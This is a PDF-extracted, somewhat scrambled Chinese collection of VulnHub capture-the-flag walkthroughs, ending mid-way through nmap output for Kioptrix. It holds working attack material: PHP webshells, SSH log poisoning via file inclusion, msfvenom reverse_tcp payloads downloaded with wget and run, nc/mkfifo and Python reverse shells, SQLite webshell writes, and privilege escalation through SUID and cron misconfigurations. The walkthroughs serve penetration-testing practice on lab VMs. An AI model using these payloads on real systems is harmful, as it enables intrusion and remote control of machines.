Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 =============================== | Groups on | =============================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ======================================================================== | Users on via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 windows下获取共享资源 linux下获取共享资源 [I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\togie (Local User) [+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password '' S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8) S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User) S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8) S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group) S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8) ============================================== | Getting printer info for | ============================================== No printers returned. enum4linux complete on Thu Feb 1 00:46:33 2018 net use k: \\\share$ mount -t cifs -o username='',password='' //$ /mnt 发现两个关键的文件deets.txt和wp-config.php 尝试用上面获取的mysql账号密码去登录phpmyadmin,但是发现没一个表项可以查看。 5 另外,上面还有一个密码是12345,而且之前登录WordPress页面的时候,页面显示 My name is togie. ,所以可 以用账号: togie 密码: 12345 尝试登录ssh,发现可以成功登录。 有了root权限,就有权限查看目标文件/root/proof.txt,这样就算完成了整个游戏了。这里刚好togie有root权限, 所以尝试直接用sudo su切换到root权限,但是如果togie没有root权限,就需要通过其他方式来提权了。 togie@LazySysAdmin:~$ whoami togie togie@LazySysAdmin:~$ id uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) togie@LazySysAdmin:~$ sudo su [sudo] password for togie: root@LazySysAdmin:/home/togie# id uid=0(root) gid=0(root) groups=0(root) 思路二 通过账号: Admin 密码: TogieMYSQL12345^^ 登录WordPress控制面板,向404.php页面模板插入PHP反弹shell 的代码。 编辑好后,点击下面的upload file应用,然后访问http:// 出现no tty present and no askpass program specified,刚好目标机有python环境,使用python派生个新的 shell。 但是不知道www-data的密码,所以接下来就要进行提权,先来看一下目标机的详细信息 root@kali:~# nc -vlp 1234 listening on [any] 1234 ... inverse host lookup failed: Unknown host connect to [] from (UNKNOWN) [] 36468 Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux 16:03:42 up 6 min, 0 users, load average: 0.01, 0.15, 0.11 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ sudo su sudo: no tty present and no askpass program specified python -c 'import pty; pty.spawn("/bin/sh")' 所以用CVE-2017-1000112提权即可,但是目标机上没有gcc,这种情况,可以本地搭建和目标机一样的环境,在本 地编译好提权exp后,在目标机器上运行即可。 dirb安装方法(kali已自带) 参考链接: VulnHub Walk-through – LazySysAdmin: 1 LazySysAdmin Vulnerable Machine Walk-through 第六节 Freshly Vulnhub-TopHatSec: Freshly 靶机简介 下载链接 https://download.vulnhub.com/tophatsec/Freshly.ova 运行环境 Virtualbox VM(运行会提示错误,给的解决链接已经404) 本靶机推荐使用Virtualbox搭建 说明 $ uname -r 4.4.0-31-generic $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 14.04.5 LTS Release: 14.04 Codename: trusty wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz tar zxvf dirb222.tar.gz cd dirb222/ apt-get install libcurl4-gnutls-dev ./configure && make ./dirb #运行即可 此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。 运行环境 将下载的OVA文件导入进Virtualbox即可。 渗透思路 服务发现 端口扫描 操作系统识别 主要端口进一步扫描 80端口 8080 发现8080和443端口均为Web,使用了WordPress。 检测已知服务 对wordpress进行扫描 发现三个插件有安全问题,但是对进一步渗透帮助不大。在扫描同时,使用 nikto 对80进行目录扫描,发现 phpmyadmin和login.php login.php Sqlmap进行检测 存在注入 查看数据库 查看WordPress8080库找到wordpress的用户名和密码 登入后台,修改语言为中文 获取shell wordpress有两种方式拿shell,一种是添加插件,将准备好的格式正确的shell添加到.zip上传。 还有一种是直接编辑 这里采用直接编辑的方式getshell。将shell写入404页面 本地开NC监听 访问404页面 Shell反弹 查看passwd 第七节 FristiLeaks v1.3 靶机信息 下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player 设置 根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76 然后开启VM 主机发现 Netdiscover –r 可以发现目标主机在10.10.10.132的位置 服务发现 nmap -sS -Pn -T4 -p- 可以看到打开了80端口,service为HTTP 详细扫描80端口 仅发现开放了80端口,对80端口进行详细探测: nmap -A -O -p80 得到以下有价值的信息: 浏览一下web站点 根据nmap扫描的结果存在 robots.txt 文件,查看一下: 访问以下 robots.txt 提到的三个路径 三个目录内容相同,只有以上画面。 接着,枚举一下目录: dirb Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3) http-robots.txt: 3 disallowed entries 在 images 目录发现几张照片: 查看图片, keep-calm 似乎是一个提示 KEEP CALM AND DRINK FRISTI 尝试访问 发现一个登陆口。登录界面存在一个严重安全问题,两个输入框都有自动完成的功能。(包括密码) 扫描一下该目录: dirb 发现了 upload 目录的index页面 查看源代码发现线索: 注释当中的信息表明,此页面是一个叫eezeepz的人留下来的。 推测, eezeepz 或许是账号或者密码 继续向下,发现一大块用base64编码的字符串 复制,写入一个文件,之后使用命令解码: base64 -d /tmp/encoded.txt 根据文件格式,这是一个PNG格式的图画,保存为PNG格式 base64 -d /tmp/encoded.txt > decoded.png 查看发现一串字符串 尝试使用以上获取的信息进行登录: 登陆成功,发现文件上传。此上传点未做任何过滤,可以直接上传shell文件。 反弹Shell的脚本木马可以在这里下载:http://pentestmonkey.net/tools/web-shells/php-reverse-shell 修改反弹shell的ip地址和监听端口。 使用 nc 监听端口: nc -nlvp 8888 根据回显,只有png, jpg, gif 能上传 修改一下文件名,后缀加上 .jpg username:eezeepz password:keKkeKKeKKeKkEkkEk cp /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php vi reverse-shell.php 上传成功,打开上传的shell: 现在已经得到了一个低端权限 权限提升 翻看一下目录,在 home 目录 看到关键人物eezeepz的家目录 在 notes.txt 当中得到提示: 根据提示说明,在/tmp下创建一个 runtis 文件 赋予权限 根据 notes.txt 的提示,在 /tmp/runtis 当中写入的命令会定时执行,那么,修改 /home/admin 目录的权限。 等待系统执行命令之后,就可以阅读 /home/admin 下的内容了 有几个文件。依次看一下。 cryptpass.py Cryptepass.txt whoisyourgodnow.txt 看样子应该是用了py文件去加密的。 重写一下文件: 解密试试 分别得到 这有可能是用户fristgod 的密码,组合试试 根据报错信息,查了资料: 跟 su 命令的实现有关; B环境上su的实现应该是判断标准输入是不是tty ; 而A环境上 su的实现则允许从其他文件读取密码。 解决方法如下: 1.mVGZ3O3omkJLmy2pcuTq :thisisalsopw123 2.=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi! Python -c 'import pty;pty.spawn("/bin/sh")' 接下来就可以正常使用了。 查看一下目录文件: 查看 .secret_admin_stuff 目录文件: 发现这个是个root的文件 权限应该是不够的 查看命令使用记录, history 命令执行结果: 可以看到 fristigod 用户一直sudo来执行命令 尝试输入之前得到的两个密码: 成功登陆: 使用 sudo 提升权限,并创建一个shell: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash 直接查看/root下的文件 读取flag文件,得到flag 第八节 The Ether 靶机信息 下载链接 http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip 运行环境 本靶机提供了VMware的镜像,从Vulnhub下载之后解压,运行 vmx 文件即可 靶机:本靶机默认使用了自动获取的上网模式。运行靶机之后,将会桥接到物理网卡,接入网络。 攻击机:Kali虚拟机运行于virtualbox,同样使用桥接模式,即可访问靶机。 靶机说明 本靶机有一定难度,不适合初学者。 本靶机的渗透目标为渗透进靶机并且找到系统中隐藏的Flag值。 官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个 混淆后的文件。 信息收集 ip发现 首先看一下Kali的网络配置。 之后使用fping发现靶机。 fping -asg 发现有本网段有四个相关IP。 端口扫描与服务识别 使用nmap快速扫描选项( -F 参数)扫描 网段 根据 Mac 可以很明显的区分, 为TP-Link路由器, 为苹果设备, 为 VMware虚拟机。可以确定 为目标靶机的IP。 确定目标IP之后,使用Nmap对目标进行更加详细的探测: nmap -A -v -oN nmap.txt 解释一下相关参数: -A 详细扫描目标IP,加载所有脚本,尽可能全面的探测信息; -v 显示详细的扫描过程; -oN 将扫描结果以普通文本的格式输出到 nmap.txt 。 结果如下: 威胁建模 分析nmap的扫描结果,发现靶机只开放了 22 和 80 端口,系统为 Ubuntu 。 22 端口为 SSH 服务, 80 端口为 http 服务,Web容器为 Apache/2.4.18 。 通常Web会存在各种各样的问题,经过初步分析,以Web作为初步的渗透入口。 Web漏洞挖掘 1. 使用niktoWeb漏洞扫描器 使用nikto工具扫描Web漏洞, nikto -h , -h 参数指定扫描目标。 没有发现什么明显的高危漏洞,发现了 images 目录和 /icons/README 文件,没有什么利用价值。 2. 使用dirb扫描网站目录 dirb 除了部分静态文件,没有发现有价值的利用点。 3. 浏览网站功能 根据前两步基本的信息探测,并没有发现漏洞点。手动访问网站,分析网站功能。 点击 ABOUT US 链接后,发现URL为: ,存在任意文件包含的可能。 4. 文件包含漏洞测试 为了直观的看到测试结果,这里使用Burpsuite处理http请求。 通过尝试包含Linux系统的配置文件,发现存在一定的限制。 如:包含 /etc/passwd 发现没有结果。 之后测试了几个常见的Apache日志的路径: 均无结果。 猜测可能是更改了配置文件的路径,尝试读Apache2的配置文件, /etc/apache2/apache2.conf ,发现也是失败。 尝试通过php伪协议读取php文件源码,也无果。 file=php://filter/convert.base64-encode/resource=index.php 根据之前整理的文件包含漏洞笔记利用思路: 结合之前信息探测的结果,靶机只开通了 http 与 ssh 服务。Apache的日志包含失败,尝试包含ssh的登陆日志。 成功读到ssh的登陆日志。 获取shell 1. 获取一句话Webshell 使用一句话作为用户名登陆靶机的ssh。 ssh '<?php eval($_GET['f']); ?>'@ SSH的日志会记录此次登陆行为,这样就可以把一句话写入ssh的日志文件。测试一下是否成功: 可以看到一句话已经成功写入。 2. msfvenom生成Meterpreter shell 平时使用Msf比较多,这里也以Msf作为接下来主要的渗透工具。 首先生成Linux平台的shell程序。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=4444 -f elf > shell.elf 3. Metasploit 设置监听 4. 种植Meterpreter shell 首先使用Python搭建一个简单的Web Server: python -m SimpleHTTPServer 80 之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。 分别发送以下请求: /var/log/apache/access.log /var/log/apache2/access.log /var/www/logs/access.log /var/log/access.log use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost exploit 1. /?file=/var/log/auth.log&f=system('wget+')%3b 2. /?file=/var/log/auth.log&f=system('chmod+%2bx+shell.elf')%3b 3. /?file=/var/log/auth.log&f=system('./shell.elf')%3b 注意: 1. 因为要执行的命令里面有空格、加号等符号,要将payload进行urlencode之后才可以正常执行。 2. 因为生成的木马文件没有执行权限,下载到靶机后也无法执行,所以需要先给 shell.elf 添加执行权限,之 后再执行。 执行结果: Web Server及msf的结果: 提升权限 Linux提权的基本思路: 1. 溢出提权 现在拿到了目标靶机的Meterpreter shell,简单的看下信息。 发现系统为 Ubuntu 16.04 (Linux 4.10.0-40-generic) ,前段时间爆了Ubuntu16.04提权的exp,在这里试一试。 exp 地址:https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c 提权失败。 2. 使用msf提权 use post/multi/recon/local_exploit_suggester 没有发现可以利用的提权漏洞。 3. 错误的SUID文件提权 进入交互式shell,派生一个bash的shell: python -c 'import pty;pty.spawn("/bin/bash")' 在Web的目录中发现了 xxxlogauditorxxx.py ,这是不应该存在的,猜测是题目所指的特殊文件,而且该文件特别 大。 运行一下该py文件,发现是审计日志的程序。 查看Apache2的日志文件,发现是执行了 cat 命令,但是因为权限 不够,没有执行成功。 仔细查看py文件的权限,发现具有SUID的权限,且文件所属用户为root。 sudo --list 查看一下用户权限。 发现可以不使用密码即可以root权限运行该py文件。这就好办多了。 该py文件的配置错误,导致可以直接以root权限执行命令。 接下来拿root权限的shell。 4. 获取root权限的shell 因为之前已经上传了Msfvenom生成的马,这里再次使用。首先退出 shell , background 命令调入后台,然后再 次开启监听,并且置于后台。 利用发现的特殊文件以root权限运行msf木马。 运行py之后,显示出现问题,不过不影响运行木马。 进入session 2的shell,查看权限: 获取flag 在root的家目录发现了 flag.png 文件: 下载到本地进行分析: 推测接下来的考点属于图片隐写。 经过分析,在图片文件的末尾发现了一串base64 将base64写入 flag.txt ,进行解码后get flag: cat flag | base64 -d 靶场思路回顾 至此,已经完成最终目标,回头分析一下之前几个失败的点。 1. Web方面利用失败原因 首先看一下index.php的核心代码: sudo ./xxxlogauditorxxx.py /var/log/apache2/access.log|./shell.elf <?php $file = $_GET["file"]; $file = str_ireplace("etc","", $file); $file = str_ireplace("php:","", $file); $file = str_ireplace("expect:","", $file); $file = str_ireplace("data:","", $file); $file = str_ireplace("proc","", $file); $file = str_ireplace("home","", $file); $file = str_ireplace("opt","", $file); if ($file == "/var/log/auth.log") { header("location: index.php"); } else{ include($file); } 可以看到 index.php 将一些关键词置空了。 所以,之前利用不成功的点原因如下: 伪协议读文件失败 过滤了 php: 且大小写敏感,故不能使用伪协议读文件。 读取配置文件、passwd文件等失败 过滤了 etc ,无法读取任何配置文件 读取Apache访问日志失败。 因权限问题, www-data 用户无法写入和读取Apache的日志文件。故,包含Apache日志失败。 2. 系统方面利用失败原因 溢出提权失败 通过分析报错,原因可能是因为靶机系统为32位,但exp只支持64位系统。 思路总结 突破点总结: 1. PHP本地文件包含漏洞发现 2. SSH日志写入一句话 3. 利用LFI和SSH日志getshell 4. MSF生成木马,利用一句话植入、运行 5. 利用错误配置SUID程序提权 在完成这次靶场的过程中,可以有很多发散的思路,比如: 1. 文件包含漏洞,可以使用字典Fuzz一下各种配置文件。 2. 使用NC或者其他反弹shell的姿势反弹shell。 此外,Metasploit Framework有很多方便实用的功能,如果能够掌握,会大大简化渗透的某些步骤,值得深入学 习。 总体来说,此靶场设计比较简单。一个Web,一个SSH,利用点无非这两个,思路比较清晰,便于实践者完成该靶 场。 第九节 zico2 靶机信息 下载链接 https://download.vulnhub.com/zico/zico2.ova include($file); ?> 运行环境 本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运 行。 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机说明 本靶机的难度为中等。 本靶机的渗透目标为渗透进靶机,拿到root权限,并读取flag文件。 官方提供了一个提示:枚举、枚举、枚举。 信息收集 ip发现 首先看一下Kali的网络配置。 之后使用nmap发现靶机。 nmap -sP 发现有本网段有四个相关IP。 端口扫描与服务识别 使用nmap快速扫描选项( -F 参数)扫描 网段 根据 Mac 可以很明显的区分, 为运行在VirtualBox上的虚拟机,即我们构建的靶机。 确定目标IP之后,使用Nmap对目标进行更加详细的探测: nmap -A -v -oN nmap.txt 解释一下相关参数: -A 详细扫描目标IP,加载所有脚本,尽可能全面的探测信息; -v 显示详细的扫描过程; -oN 将扫描结果以普通文本的格式输出到 nmap.txt 。 结果如下: 威胁建模 分析nmap的扫描结果,发现靶机开放了 22 和 80 , 111 端口,系统为 Linux 。 22 端口为 SSH 服务, 80 端口为 http 服务,Web容器为 Apache/2.2.22 。 通常Web会存在各种各样的问题,经过初步分析,以Web作为初步的渗透入口。 Web漏洞挖掘 1. 使用dirb扫描网站目录 dirb 发现敏感目录 dbadmin 2. 目录遍历漏洞 访问 ,发现目录遍历了,同时存在 test_db.php 文件。 3. 弱口令 访问 ,发现是类似于MySQL的phpmyadmin,靶机的这个是sqlite的 网页版管理。 尝试弱口令 admin 即可进入。 4. phpLiteAdmin的信息收集 查看原有的数据库,发现里面存在两个账号,使用somd5.com 解密。 得到以下信息: 5. 文件包含漏洞 浏览网站功能,发现一个连接为: 猜测存在文件包含漏洞。经过尝试,可以成功包含Linux的passwd文件。 获取Webshell 1. 尝试通过新建数据库getshell Sqlite数据库一般应用在很多嵌入式设备当中,属于单文件的数据库,类似于Access数据库。这里尝试新建一个名 为 shell.php 的数据库文件,对应的会生成shell.php的一个文件。但是观察到数据库文件的路径 在 /usr/databases/test_users 那么,尝试新建一个数据库名为 ../../var/www/html/shell.php 。 新建成功,但是发现过滤掉了 / 。此方法失败,但留作记录,算是一个突破点。 2. 尝试导出文件getshell payload: ATTACH DATABASE '/var/www/html/shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>'); 通过这种方式写文件,适用于以下场景: 1. 可直接访问数据库执行SQL语句。 2. 堆叠查询选项启用(默认关闭) 执行失败,放弃这个点。 3. 利用phpliteadmin和文件包含漏洞getshell 经过前期的尝试,发现了文件包含漏洞和数据库权限。两者结合,即可getshell。方法如下: 1. 通过phpliteadmin新加一条数据,写入数据库文件。 root 34kroot34 zico zico2215@ 2. 利用文件包含漏洞包含数据库文件getshell。 4. 种植Meterpreter shell 首先生成一个msf的可执行木马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=4444 -f elf > ~/Desktop/msf.elf 之后使用Python搭建一个简单的Web Server: python -m SimpleHTTPServer 80 之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。 下载木马: x=system('wget'); 之后 x=system('ls'); 发现并没有保存,推测是因为权限问题。那么,直接下载到 /tmp 目录 x=system('wget -O /tmp/msf.elf'); 查看一下: 之后添加执行权限并且运行。 结果如下: 提升权限 Linux提权的基本思路: 1. 使用msf提权 use post/multi/recon/local_exploit_suggester 没有发现可以利用的提权漏洞。 2. 溢出提权 现在拿到了目标靶机的Meterpreter shell,简单的看下信息。 发现系统为 Ubuntu 12.04 (Linux 3.2.0-23-generic) 。到 www.exploit-db.com 搜索对应的exp。 这里使用第二个EXP。地址为: https://www.exploit-db.com/exploits/33589/ x=system('chmod +x /tmp/msf.elf'); x=system('/tmp/msf.elf'); 使用方法: 首先使用Meterpreter的shell把C代码写入: 进入shell,使用Python spawn一个shell。 python -c 'import pty;pty.spawn("/bin/bash")' 。 之后编译执行exp。 获取flag 在root的家目录发现了 flag.txt 文件: 靶场思路回顾 至此,已经完成最终目标,回头分析一下之前几个失败的点。 1. 使用phpliteadmin写马失败原因 发现网站的根目录为 /var/www 而不是 /var/www/html ,其次 www 目录的权限问题,不能直接写shell。 但是 /var/www/ 下的其他目录,权限设置的非常大,可以直接写shell。 2.再次利用phpliteadmin写马尝试getshell 在以上基础上,我们知道了网站的绝对路径,且网站目录的其他文件夹权限设置有问题。 尝试写shell: 成功写入: 思路总结 突破点总结: 1. phpliteadmin登陆弱口令 2. 通过phpliteadmin向数据库文件写入一句话木马 3. 利用LFI和数据库文件getshell 4. MSF生成木马,利用一句话寻找可写目录植入、运行 5. 利用系统漏洞提权为root 在完成这次靶场的过程中,可以有很多发散的思路,比如: 1. 文件包含漏洞,可以使用字典Fuzz一下各种配置文件和日志文件。比如通过包含SSH日志的方式getshell。 2. Fuzz一下网站的绝对路径,利用phpliteadmin写shell。 总体来说,此靶场很有意思。既考察了Web基本的漏洞、phpliteadmin的组合利用,也考察了目录权限设置的知 识点。可以有多种方式完成,可玩性高。 第十节 Quaoar 靶机信息 下载链接 https://download.vulnhub.com/hackfest2016/Quaoar.ova 运行环境 本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运 行。 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机说明 本靶机的难度为初学者。 本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。 作者推荐工具 nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra 信息收集 ip发现 首先看一下Kali的网络配置。 靶机IP机器直接说明 端口扫描与服务识别 确定目标IP之后,使用Nmap对目标进行更加详细的探测: nmap -A -v -oN nmap.txt 解释一下相关参数: -A 详细扫描目标IP,加载所有脚本,尽可能全面的探测信息; -v 显示详细的扫描过程; -oN 将扫描结果以普通文本的格式输出到 nmap.txt 。 结果如下: 威胁建模 分析nmap的扫描结果,发现靶机开放了 22 和 80 端口,系统为 Linux 。 22 端口为 SSH 服务, 80 端口为 http 服务,Web容器为 Apache/2.2.22 。 通常Web会存在各种各样的问题,经过初步分析,以Web作为初步的渗透入口。 Web漏洞挖掘 1. 使用dirb扫描网站目录 dirb 发现robots.txt,upload目录,wordpress目录。 查看robots.txt,指向的也是wordpress目录 2. 弱口令 利用wpscan进行扫描 尝试弱口令 admin admin 即可进入。 获取Webshell 1. 尝试通过修添加获得shell cp /usr/share/webshells/php/php-reverse-shell.php shelly.php 对shell进行修改,然后本地开NC进行监听,访问一个不存在的页面,得到shell 利用python获得一个新shell `python -c 'import pty; pty.spawn("/bin/bash")' 在该权限下,获取第一个shell 提升权限 1. 查看应用密码尝试弱口令 wpscan -u --wp-content-dir wp-content --enumerate u [+] Enumerating usernames ... [+] Identified the following 2 user/s: +----+--------+--------+ | Id | Login | Name | +----+--------+--------+ | 1 | admin | admin | | 2 | wpuser | wpuser | +----+--------+--------+ [!] Default first WordPress username 'admin' is still used [+] Finished: Fri Jul 6 22:13:24 2018 [+] Requests Done: 62 [+] Memory used: 63.867 MB [+] Elapsed time: 00:00:05 查看wordpress的配置文件 发现root的账号密码 得到root权限 拿到另一个flag 第十一节 SickOs 1.1 靶机信息 下载链接 https://download.vulnhub.com/sickos/sick0s1.1.7z 运行环境 本靶机提供了OVF格式的镜像,官方推荐使用VMware Workstation,从Vulnhub下载之后,导入到VMware Workstation即可运行。 靶机:NAT自动获取IP。 攻击机:NAT自动获取IP:。 靶机说明 本靶机目的是拿到root权限,读取/root/a0216ea4d51874464078c618298b1367.txt文件。 信息收集 ip发现 靶机所处网段是192.168.202.1/24,使用nmap扫描获取靶机IP:。 端口扫描与服务识别 对该IP全端口扫描如下: 发现使用squid代理。尝试设置浏览器代理,访问http:// 初 步得到结果是通过挂代理对靶机IP进行漏洞挖掘。 Web漏洞挖掘 设置代理进行目录爆破: 访问robots.txt: 发现是wolfcms,前台都是一些静态页面,无可利用点。 默认地址http://进入管理后台: 尝试使用admin/admin弱口令进入后台,从提示信息可以看出cms版本<,可能存在文件上传漏洞: 获取webshell 思路一 后台可以上传任意后缀文件,上大马,获取webshell: 直接读取文件发现权限不够,没有回显: 查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权: 利用大马功能反弹shell: 思路二 扫描目录时还发现了cgi-bin目录,通过百度发现可能存在bash漏洞可以直接getshell。利用nc反弹shell。 提升权限 尝试使用su切换用户或者sudo直接查看文件,发现没权限: 进入网站部署的目录: 发现有配置文件,运气好可能有存储明文用户密码: 使用获取的用户密码连接数据库失败,尝试用对应密码进行root登录失败。 查看系统的其他用户,发现sickos账户很特别: 用户名:sickos,密码:john@123登录成功。 sudo命令查看文件: 思路总结 1.利用文件上传漏洞或者bash漏洞获取系统shell。 2.部署的网站可能会存储数据库等明文用户密码,可以加以利用。 第十二节 BSides-Vancouver-2018-Workshop 靶机信息 下载链接 https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova 靶机说明 靶机用ValualBox创建,目标是在其上获得root级访问。 目标 Boot to root:获得root权限和Flag。 运行环境 靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥 接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。 攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、 Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全 面的渗透工具。 信息收集 IP识别 启动虚拟机,使用nmap扫描C段IP nmap -sP 获得虚机IP 端口和服务识别 Nmap命令: nmap -p1-65535 -open -A -oN BSides.txt 汇总开放的端口和服务: 端口 服务 提示信息 21 FTP vsftpd2.3.5 允许匿名登录 22 ssh OpenSSH 5.9p1 80 http Apache httpd 2.2.22 (Ubuntu) 漏洞挖掘 渗透方法一: 0x01 匿名登录FTP获得用户 Windows下使用XFTP匿名登录FTP:在public目录下,找到users.txt.bk文件,用记事本打开: 获得5个用户名:abatchy,john,mai,anne,doomguy 0x02 用5个用户名加弱口令字典进行ssh暴破 Windows下可使用九头蛇Hydra Windows版本或其他工具暴破,这里采用“超级弱口令检查工具V1.0”进行暴破,线 程不能开太高,否则虚机会挂,4线程。 字典的选择,选用字典:darkweb2017-top10000.txt。 暴破得到用户名:anne 密码:princess 0x03 登录ssh,具有sudo权限,获得flag 使用Xshell工具ssh登录账号:anne 密码:princess 执行id命令和sudo -l命令,发现anne具有sudo权限: 执行sudo -l /root命令,sudo cat /root/flag.txt命令,获得flag: 渗透方法二: 0x01 环境设置 因需要用到Kali虚机, 需要调整将bsides虚拟机、Kali攻击机都桥接到笔记本电脑的无线网卡,bsides虚拟机会重 新获得新IP。使用Namp扫描无线网卡C段可获得bsides虚机的新IP为:,Kali虚机的IP是:。 Nmap命令: nmap -sP 同样匿名登录FTP,获得5个用户名:abatchy,john,mai,anne,doomguy 0x02 访问80端口http服务 访问 访问 发现/backup_wordpress目录: 访问 进入WordPress页面: 0x03 使用wpscan扫描WordPress,暴破后台用户名和密码: (1)暴破用户名,命令 wpscan -u --enumerate u 获得用户名:admin john (2)使用wpscan默认字典,暴破密码: wpscan --url wpscan -u --wordlist /root/share/darkweb2017- top10000.txt --username john 暴破字典依然使用darkweb2017-top10000.txt弱口令字典: 暴破成功,获得用户名john 密码enigma 获取shell 0x04 登录并反弹shell (1)使用用户名 john 密码enigma登录WordPress,登录地址 login.php (2)WordPress获取shell的方法有多种,进入 Appearance -> Editor ,点击右边的 Theme Header ,在编辑器里面 插入一句话命令执行小马 <?php system($_GET['cmd']); ?> 保存。 (3)在Burpsuit中通过cmd参数执行命令,访问;ls 成功执行id和ls命令: (4)通过nc反弹shell 执行命令 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f ,需将命令进行url编码,然后在Burpsuit中发送: (5)Windows攻击机开启nc接收反弹shell成功: (6)为查找和传送文件方便,写入菜刀马 echo '<?php eval($_POST['123456']);?>' >> caidao.php 菜刀连接成功: 提升权限 0x5 查找用户文件 (1)查找每个用户文件,和浏览各目录文件,发现位于 /usr/local/bin/cleanup 文件,其权限是777,查看内容 为: #!/bin/sh rm -rf /var/log/apache2/* # Clean those damn logs!! 这是一段清理Apache日志的脚本,需要root权限运行。 查看cleanup文件的权限为777,可以随意修改和执行,可以将文件内容改成一个反弹shell。 (2)在菜刀中直接修改cleanup文件为反弹shell命令:因在 /usr/local/lib/python2.7/ 目录下安装有Python2.7, 所以可以使用Python反弹shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555) );os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","- i"]);' (3)Windows开启NC,等待接收反弹shell,root权限: (4)查看flag: 思路总结 突破点和坑 1.没有突破点的时候,就尝试暴破已知用户名的密码,字典采用国外密码字段较好。 2.Linux反弹shell有多种姿势,bash、nc、php、Python等都需要尝试。 3.需熟悉WordPress后台getshell姿势。 4.靶机作者提示有多种方法,肯定还有其他方法,本次渗透使用了暴破ssh用户和WordPress渗透两种方法。 第十三节 Kioptrix 1 title: Vulnhub渗透测试练习-Kioptrix 1 date: 2018-05-07 15:28:05 categories: 笔记 作者:Ukonw 信息收集 通过 netdiscover 发现目标主机IP地址。 从扫描信息的得的目标主机的IP地址为 nmap 扫描IP的端口信息 nmap -A root@kali:~# nmap -A -sS Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using -- system-dns or specify valid servers with --dns-servers Nmap scan report for Host is up (0.00055s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh 